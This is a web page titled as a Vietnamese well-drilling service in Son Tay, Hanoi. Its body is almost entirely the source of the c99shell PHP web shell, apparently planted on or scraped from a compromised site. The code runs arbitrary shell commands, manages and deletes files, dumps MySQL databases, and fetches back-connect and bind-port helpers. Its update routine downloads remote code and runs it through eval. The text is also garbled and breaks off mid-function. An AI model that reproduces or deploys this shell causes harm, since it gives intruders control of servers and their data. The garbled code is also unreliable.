Copyright © 2004 - 2016. All Rights Reserved by Kien White Home/ Khoan Giếng thị xã Sơn Tây Hà Nội
Khoan Giếng thị xã Sơn Tây Hà Nội
/____/ /____/ /_______ /|___| /\___ >____/____/ \_/ / \_______ / \_____ / / / / / / / / / _ _____ _ __ ___ _ __ ______ | | | __ (_) / / | | /_ |___ / | |__ _ _ | |__) | _ __ ___ _ / / /| |__| || | / / | '_ | | | | | ___/ | '_ / _ | | | / / / | __ || | / / | |_) | |_| | | | | | | | | (_) | |_| | / / | | | || |/ /__ |_.__/ \__, | |_| |_|_| |_|\___/ \__, | / / |_| |_||_/_____| __/ | __/ | |___/ |___/ * c99shell.php v.2.0 (PHP 7) (25.02.2019) Updated by: PinoyWH1Z for PHP 7 * https://github.com/PinoyWH1Z/C99Shell-PHP7 **************************************************************************************************** */ if (!function_exists("getmicrotime")) { function getmicrotime() { list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec); } } error_reporting(5); @ignore_user_abort(true); $win = strtolower(substr(PHP_OS, 0, 3)) == "win"; define("starttime", getmicrotime()); if (get_magic_quotes_gpc()) { if (!function_exists("strips")) { function strips(&$arr, $k = "") { if (is_array($arr)) { foreach ($arr as $k => $v) { if (strtoupper($k) != "GLOBALS") { strips($arr["$k"]); } } } else { $arr = stripslashes($arr); } } } strips($GLOBALS); } $_REQUEST = array_merge($_COOKIE, $_GET, $_POST); foreach ($_REQUEST as $k => $v) { if (!isset($$k)) { $$k = $v; } } $shver = "2.0 [PHP 7 Update] [25.02.2019]"; if (!empty($unset_surl)) { setcookie("c99sh_surl"); $surl = ""; } elseif (!empty($set_surl)) { $surl = $set_surl; setcookie("c99sh_surl", $surl); } else { $surl = $_REQUEST["c99sh_surl"]; } $surl_autofill_include = true; if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) { $include = "&"; foreach (explode("&", getenv("QUERY_STRING")) as $v) { $v = explode("=", $v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array( "http://", "https://", "ssl://", "ftp://", "\\" ) as $needle) { if (strpos($value, $needle) === 0) { $includestr .= urlencode($name) . "=" . urlencode($value) . "&"; } } } if ($_REQUEST["surl_autofill_include"]) { $includestr .= "surl_autofill_include=1&"; } } if (empty($surl)) { $surl = "?" . $includestr; } $surl = htmlspecialchars($surl); $timelimit = 0; $login = ""; $pass = ""; $md5_pass = ""; $host_allow = array( "*" ); $login_txt = "Restricted area"; $accessdeniedmess = "c99shell v." . $shver . ": access denied"; $gzipencode = true; $updatenow = false; $c99sh_updateurl = "https://github.com/PinoyWH1Z/C99Shell-PHP7/"; $c99sh_sourcesurl = "https://github.com/PinoyWH1Z/C99Shell-PHP7/"; $filestealth = true; $donated_html = "", " ", $donated_html)); } header("WWW-Authenticate: Basic realm="c99shell " . $shver . ": " . $login_txt . """); header("HTTP/1.0 401 Unauthorized"); exit($accessdeniedmess); } } if ($act != "img") { $lastdir = realpath("."); chdir($curdir); if ($selfwrite or $updatenow) { @ob_clean(); c99sh_getupdate($selfwrite, 1); exit; } $sess_data = unserialize($_COOKIE["$sess_cookie"]); if (!is_array($sess_data)) { $sess_data = array(); } if (!is_array($sess_data["copy"])) { $sess_data["copy"] = array(); } if (!is_array($sess_data["cut"])) { $sess_data["cut"] = array(); } $disablefunc = @ini_get("disable_functions"); if (!empty($disablefunc)) { $disablefunc = str_replace(" ", "", $disablefunc); $disablefunc = explode(",", $disablefunc); } if (!function_exists("c99_buff_prepare")) { function c99_buff_prepare() { global $sess_data; global $act; foreach ($sess_data["copy"] as $k => $v) { $sess_data["copy"][$k] = str_replace("\", DIRECTORY_SEPARATOR, realpath($v)); } foreach ($sess_data["cut"] as $k => $v) { $sess_data["cut"][$k] = str_replace("\", DIRECTORY_SEPARATOR, realpath($v)); } $sess_data["copy"] = array_unique($sess_data["copy"]); $sess_data["cut"] = array_unique($sess_data["cut"]); sort($sess_data["copy"]); sort($sess_data["cut"]); if ($act != "copy") { foreach ($sess_data["cut"] as $k => $v) { if ($sess_data["copy"][$k] == $v) { unset($sess_data["copy"][$k]); } } } else { foreach ($sess_data["copy"] as $k => $v) { if ($sess_data["cut"][$k] == $v) { unset($sess_data["cut"][$k]); } } } } } c99_buff_prepare(); if (!function_exists("c99_sess_put")) { function c99_sess_put($data) { global $sess_cookie; global $sess_data; c99_buff_prepare(); $sess_data = $data; $data = serialize($data); setcookie($sess_cookie, $data); } } foreach (array( "sort", "sql_sort" ) as $v) { if (!empty($_GET[$v])) { $$v = $_GET[$v]; } if (!empty($_POST[$v])) { $$v = $_POST[$v]; } } if ($sort_save) { if (!empty($sort)) { setcookie("sort", $sort); } if (!empty($sql_sort)) { setcookie("sql_sort", $sql_sort); } } if (!function_exists("str2mini")) { function str2mini($content, $len) { if (strlen($content) > $len) { $len = ceil($len / 2) - 2; return substr($content, 0, $len) . "..." . substr($content, -$len); } else { return $content; } } } if (!function_exists("view_size")) { function view_size($size) { if (!is_numeric($size)) { return false; } else { if ($size >= 1073741824) { $size = round($size / 1073741824 * 100) / 100 . " GB"; } elseif ($size >= 1048576) { $size = round($size / 1048576 * 100) / 100 . " MB"; } elseif ($size >= 1024) { $size = round($size / 1024 * 100) / 100 . " KB"; } else { $size = $size . " B"; } return $size; } } } if (!function_exists("fs_copy_dir")) { function fs_copy_dir($d, $t) { $d = str_replace("\", DIRECTORY_SEPARATOR, $d); if (substr($d, -1) != DIRECTORY_SEPARATOR) { $d .= DIRECTORY_SEPARATOR; } $h = opendir($d); while (($o = readdir($h)) !== false) { if (($o != ".") and ($o != "..")) { if (!is_dir($d . DIRECTORY_SEPARATOR . $o)) { $ret = copy($d . DIRECTORY_SEPARATOR . $o, $t . DIRECTORY_SEPARATOR . $o); } else { $ret = mkdir($t . DIRECTORY_SEPARATOR . $o); fs_copy_dir($d . DIRECTORY_SEPARATOR . $o, $t . DIRECTORY_SEPARATOR . $o); } if (!$ret) { return $ret; } } } closedir($h); return true; } } if (!function_exists("fs_copy_obj")) { function fs_copy_obj($d, $t) { $d = str_replace("\", DIRECTORY_SEPARATOR, $d); $t = str_replace("\", DIRECTORY_SEPARATOR, $t); if (!is_dir(dirname($t))) { mkdir(dirname($t)); } if (is_dir($d)) { if (substr($d, -1) != DIRECTORY_SEPARATOR) { $d .= DIRECTORY_SEPARATOR; } if (substr($t, -1) != DIRECTORY_SEPARATOR) { $t .= DIRECTORY_SEPARATOR; } return fs_copy_dir($d, $t); } elseif (is_file($d)) { return copy($d, $t); } else { return false; } } } if (!function_exists("fs_move_dir")) { function fs_move_dir($d, $t) { $h = opendir($d); if (!is_dir($t)) { mkdir($t); } while (($o = readdir($h)) !== false) { if (($o != ".") and ($o != "..")) { $ret = true; if (!is_dir($d . DIRECTORY_SEPARATOR . $o)) { $ret = copy($d . DIRECTORY_SEPARATOR . $o, $t . DIRECTORY_SEPARATOR . $o); } else { if (mkdir($t . DIRECTORY_SEPARATOR . $o) and fs_copy_dir($d . DIRECTORY_SEPARATOR . $o, $t . DIRECTORY_SEPARATOR . $o)) { $ret = false; } } if (!$ret) { return $ret; } } } closedir($h); return true; } } if (!function_exists("fs_move_obj")) { function fs_move_obj($d, $t) { $d = str_replace("\", DIRECTORY_SEPARATOR, $d); $t = str_replace("\", DIRECTORY_SEPARATOR, $t); if (is_dir($d)) { if (substr($d, -1) != DIRECTORY_SEPARATOR) { $d .= DIRECTORY_SEPARATOR; } if (substr($t, -1) != DIRECTORY_SEPARATOR) { $t .= DIRECTORY_SEPARATOR; } return fs_move_dir($d, $t); } elseif (is_file($d)) { if (copy($d, $t)) { return unlink($d); } else { unlink($t); return false; } } else { return false; } } } if (!function_exists("fs_rmdir")) { function fs_rmdir($d) { $h = opendir($d); while (($o = readdir($h)) !== false) { if (($o != ".") and ($o != "..")) { if (!is_dir($d . $o)) { unlink($d . $o); } else { fs_rmdir($d . $o . DIRECTORY_SEPARATOR); rmdir($d . $o); } } } closedir($h); rmdir($d); return !is_dir($d); } } if (!function_exists("fs_rmobj")) { function fs_rmobj($o) { $o = str_replace("\", DIRECTORY_SEPARATOR, $o); if (is_dir($o)) { if (substr($o, -1) != DIRECTORY_SEPARATOR) { $o .= DIRECTORY_SEPARATOR; } return fs_rmdir($o); } elseif (is_file($o)) { return unlink($o); } else { return false; } } } if (!function_exists("myshellexec")) { function myshellexec($cmd) { global $disablefunc; $result = ""; if (!empty($cmd)) { if (is_callable("exec") and !in_array("exec", $disablefunc)) { exec($cmd, $result); $result = join(" ", $result); } elseif (($result = `$cmd`) !== false) { } elseif (is_callable("system") and !in_array("system", $disablefunc)) { $v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v; } elseif (is_callable("passthru") and !in_array("passthru", $disablefunc)) { $v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v; } elseif (is_resource($fp = popen($cmd, "r"))) { $result = ""; while (!feof($fp)) { $result .= fread($fp, 1024); } pclose($fp); } } return $result; } } if (!function_exists("tabsort")) { function tabsort($a, $b) { global $v; return strnatcmp($a[$v], $b[$v]); } } if (!function_exists("view_perms")) { function view_perms($mode) { if (($mode & 0xC000) === 0xC000) { $type = "s"; } elseif (($mode & 0x4000) === 0x4000) { $type = "d"; } elseif (($mode & 0xA000) === 0xA000) { $type = "l"; } elseif (($mode & 0x8000) === 0x8000) { $type = "-"; } elseif (($mode & 0x6000) === 0x6000) { $type = "b"; } elseif (($mode & 0x2000) === 0x2000) { $type = "c"; } elseif (($mode & 0x1000) === 0x1000) { $type = "p"; } else { $type = "?"; } $owner["read"] = ($mode & 00400) ? "r" : "-"; $owner["write"] = ($mode & 00200) ? "w" : "-"; $owner["execute"] = ($mode & 00100) ? "x" : "-"; $group["read"] = ($mode & 00040) ? "r" : "-"; $group["write"] = ($mode & 00020) ? "w" : "-"; $group["execute"] = ($mode & 00010) ? "x" : "-"; $world["read"] = ($mode & 00004) ? "r" : "-"; $world["write"] = ($mode & 00002) ? "w" : "-"; $world["execute"] = ($mode & 00001) ? "x" : "-"; if ($mode & 0x800) { $owner["execute"] = ($owner["execute"] == "x") ? "s" : "S"; } if ($mode & 0x400) { $group["execute"] = ($group["execute"] == "x") ? "s" : "S"; } if ($mode & 0x200) { $world["execute"] = ($world["execute"] == "x") ? "t" : "T"; } return $type . join("", $owner) . join("", $group) . join("", $world); } } if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid", $disablefunc)) { function posix_getpwuid($uid) { return false; } } if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid", $disablefunc)) { function posix_getgrgid($gid) { return false; } } if (!function_exists("posix_kill") and !in_array("posix_kill", $disablefunc)) { function posix_kill($gid) { return false; } } if (!function_exists("parse_perms")) { function parse_perms($mode) { if (($mode & 0xC000) === 0xC000) { $t = "s"; } elseif (($mode & 0x4000) === 0x4000) { $t = "d"; } elseif (($mode & 0xA000) === 0xA000) { $t = "l"; } elseif (($mode & 0x8000) === 0x8000) { $t = "-"; } elseif (($mode & 0x6000) === 0x6000) { $t = "b"; } elseif (($mode & 0x2000) === 0x2000) { $t = "c"; } elseif (($mode & 0x1000) === 0x1000) { $t = "p"; } else { $t = "?"; } $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0; $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0; $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0; return array( "t" => $t, "o" => $o, "g" => $g, "w" => $w ); } } if (!function_exists("parsesort")) { function parsesort($sort) { $one = intval($sort); $second = substr($sort, -1); if ($second != "d") { $second = "a"; } return array( $one, $second ); } } if (!function_exists("view_perms_color")) { function view_perms_color($o) { if (!is_readable($o)) { return "" . view_perms(fileperms($o)) . ""; } elseif (!is_writable($o)) { return "" . view_perms(fileperms($o)) . ""; } else { return "" . view_perms(fileperms($o)) . ""; } } } if (!function_exists("c99getsource")) { function c99getsource($fn) { global $c99sh_sourcesurl; $array = array( "c99sh_bindport.pl" => "c99sh_bindport_pl.txt", "c99sh_bindport.c" => "c99sh_bindport_c.txt", "c99sh_backconn.pl" => "c99sh_backconn_pl.txt", "c99sh_backconn.c" => "c99sh_backconn_c.txt", "c99sh_datapipe.pl" => "c99sh_datapipe_pl.txt", "c99sh_datapipe.c" => "c99sh_datapipe_c.txt", ); $name = $array[$fn]; if ($name) { return file_get_contents($c99sh_sourcesurl . $name); } else { return false; } } } if (!function_exists("c99sh_getupdate")) { function c99sh_getupdate($update = true) { $url = $GLOBALS["c99sh_updateurl"] . "?version=" . urlencode(base64_encode($GLOBALS["shver"])) . "&updatenow=" . ($updatenow ? "1" : "0") . "&"; $data = @file_get_contents($url); if (!$data) { return "Can't connect to update-server!"; } else { $data = ltrim($data); $string = substr($data, 3, ord($data{2})); if ($data{0} == "x99" and $data{1} == "x01") { return "Error: " . $string; return false; } if ($data{0} == "x99" and $data{1} == "x02") { return "You are using latest version!"; } if ($data{0} == "x99" and $data{1} == "x03") { $string = explode("x01", $string); if ($update) { $confvars = array(); $sourceurl = $string[0]; $source = file_get_contents($sourceurl); if (!$source) { return "Can't fetch update!"; } else { $fp = fopen(__FILE__, "w"); if (!$fp) { return "Local error: can't write update to " . __FILE__ . "! You may download c99shell.php manually here."; } else { fwrite($fp, $source); fclose($fp); return "Thanks! Updated with success."; } } } else { return "New version are available: " . $string[1]; } } elseif ($data{0} == "x99" and $data{1} == "x04") { eval($string); return 1; } else { return "Error in protocol: segmentation failed! (" . $data . ") "; } } } } if (!function_exists("mysql_dump")) { function mysql_dump($set) { global $shver; $sock = $set["sock"]; $db = $set["db"]; $print = $set["print"]; $nl2br = $set["nl2br"]; $file = $set["file"]; $add_drop = $set["add_drop"]; $tabs = $set["tabs"]; $onlytabs = $set["onlytabs"]; $ret = array(); $ret["err"] = array(); if (!is_resource($sock)) { echo ("Error: $sock is not valid resource."); } if (empty($db)) { $db = "db"; } if (empty($print)) { $print = 0; } if (empty($nl2br)) { $nl2br = 0; } if (empty($add_drop)) { $add_drop = true; } if (empty($file)) { $file = $tmpdir . "dump_" . getenv("SERVER_NAME") . "_" . $db . "_" . date("d-m-Y-H-i-s") . ".sql"; } if (!is_array($tabs)) { $tabs = array(); } if (empty($add_drop)) { $add_drop = true; } if (sizeof($tabs) == 0) { $res = mysql_query("SHOW TABLES FROM " . $db, $sock); if (mysql_num_rows($res) > 0) { while ($row = mysql_fetch_row($res)) { $tabs[] = $row[0]; } } } $out = "# Dumped by C99Shell.SQL v. " . $shver . " # Home page: https://github.com/PinoyWH1Z/C99Shell-PHP7 # # Host settings: # MySQL version: (" . mysql_get_server_info() . ") running on " . getenv("SERVER_ADDR") . " (" . getenv("SERVER_NAME") . ")" . " # Date: " . date("d.m.Y H:i:s") . " # DB: "" . $db . "" #--------------------------------------------------------- "; $c = count($onlytabs); foreach ($tabs as $tab) { if ((in_array($tab, $onlytabs)) or (!$c)) { if ($add_drop) { $out .= "DROP TABLE IF EXISTS `" . $tab . "`; "; } $res = mysql_query("SHOW CREATE TABLE `" . $tab . "`", $sock); if (!$res) { $ret["err"][] = mysql_smarterror(); } else { $row = mysql_fetch_row($res); $out .= $row["1"] . "; "; $res = mysql_query("SELECT * FROM `$tab`", $sock); if (mysql_num_rows($res) > 0) { while ($row = mysql_fetch_assoc($res)) { $keys = implode("`, `", array_keys($row)); $values = array_values($row); foreach ($values as $k => $v) { $values[$k] = addslashes($v); } $values = implode("', '", $values); $sql = "INSERT INTO `$tab`(`" . $keys . "`) VALUES ('" . $values . "'); "; $out .= $sql; } } } } } $out .= "#--------------------------------------------------------------------------------- "; if ($file) { $fp = fopen($file, "w"); if (!$fp) { $ret["err"][] = 2; } else { fwrite($fp, $out); fclose($fp); } } if ($print) { if ($nl2br) { echo nl2br($out); } else { echo $out; } } return $out; } } if (!function_exists("mysql_buildwhere")) { function mysql_buildwhere($array, $sep = " and", $functs = array()) { if (!is_array($array)) { $array = array(); } $result = ""; foreach ($array as $k => $v) { $value = ""; if (!empty($functs[$k])) { $value .= $functs[$k] . "("; } $value .= "'" . addslashes($v) . "'"; if (!empty($functs[$k])) { $value .= ")"; } $result .= "`" . $k . "` = " . $value . $sep; } $result = substr($result, 0, strlen($result) - strlen($sep)); return $result; } } if (!function_exists("mysql_fetch_all")) { function mysql_fetch_all($query, $sock) { if ($sock) { $result = mysql_query($query, $sock); } else { $result = mysql_query($query); } $array = array(); while ($row = mysql_fetch_array($result)) { $array[] = $row; } mysql_free_result($result); return $array; } } if (!function_exists("mysql_smarterror")) { function mysql_smarterror($type, $sock) { if ($sock) { $error = mysql_error($sock); } else { $error = mysql_error(); } $error = htmlspecialchars($error); return $error; } } if (!function_exists("mysql_query_form")) { function mysql_query_form() { global $submit, $sql_act, $sql_query, $sql_query_result, $sql_confirm, $sql_query_error, $tbl_struct; if (($submit) and (!$sql_query_result) and ($sql_confirm)) { if (!$sql_query_error) { $sql_query_error = "Query was empty"; } echo "Error:
" . $sql_query_error . "
"; } if ($sql_query_result or (!$sql_confirm)) { $sql_act = $sql_goto; } if ((!$submit) or ($sql_act)) { echo "
"; if ($tbl_struct) { echo " | Fields: "; foreach ($tbl_struct as $field) { $name = $field["Field"]; echo "» " . $name . " "; } echo " |
!C99Shell v. ! | |
---|---|
Software: uname -a: ", 1); ?> ", 1); } else { echo get_current_user(); } ?> Safe-mode: " . htmlspecialchars($b) . DIRECTORY_SEPARATOR . "";
$i++;
}
echo " ";
if (is_writable($d))
{
$wd = true;
$wdt = "[ ok ]";
echo "" . view_perms(fileperms($d)) . "";
}
else
{
$wd = false;
$wdt = "[ Read-Only ]";
echo "" . view_perms_color($d) . "";
}
if (is_callable("disk_free_space"))
{
$free = disk_free_space($d);
$total = disk_total_space($d);
if ($free === false)
{
$free = 0;
}
if ($total === false)
{
$total = 0;
}
if ($free < 0)
{
$free = 0;
}
if ($total < 0)
{
$total = 0;
}
$used = $total - $free;
$free_percent = round(100 / ($total / $free) , 2);
echo " |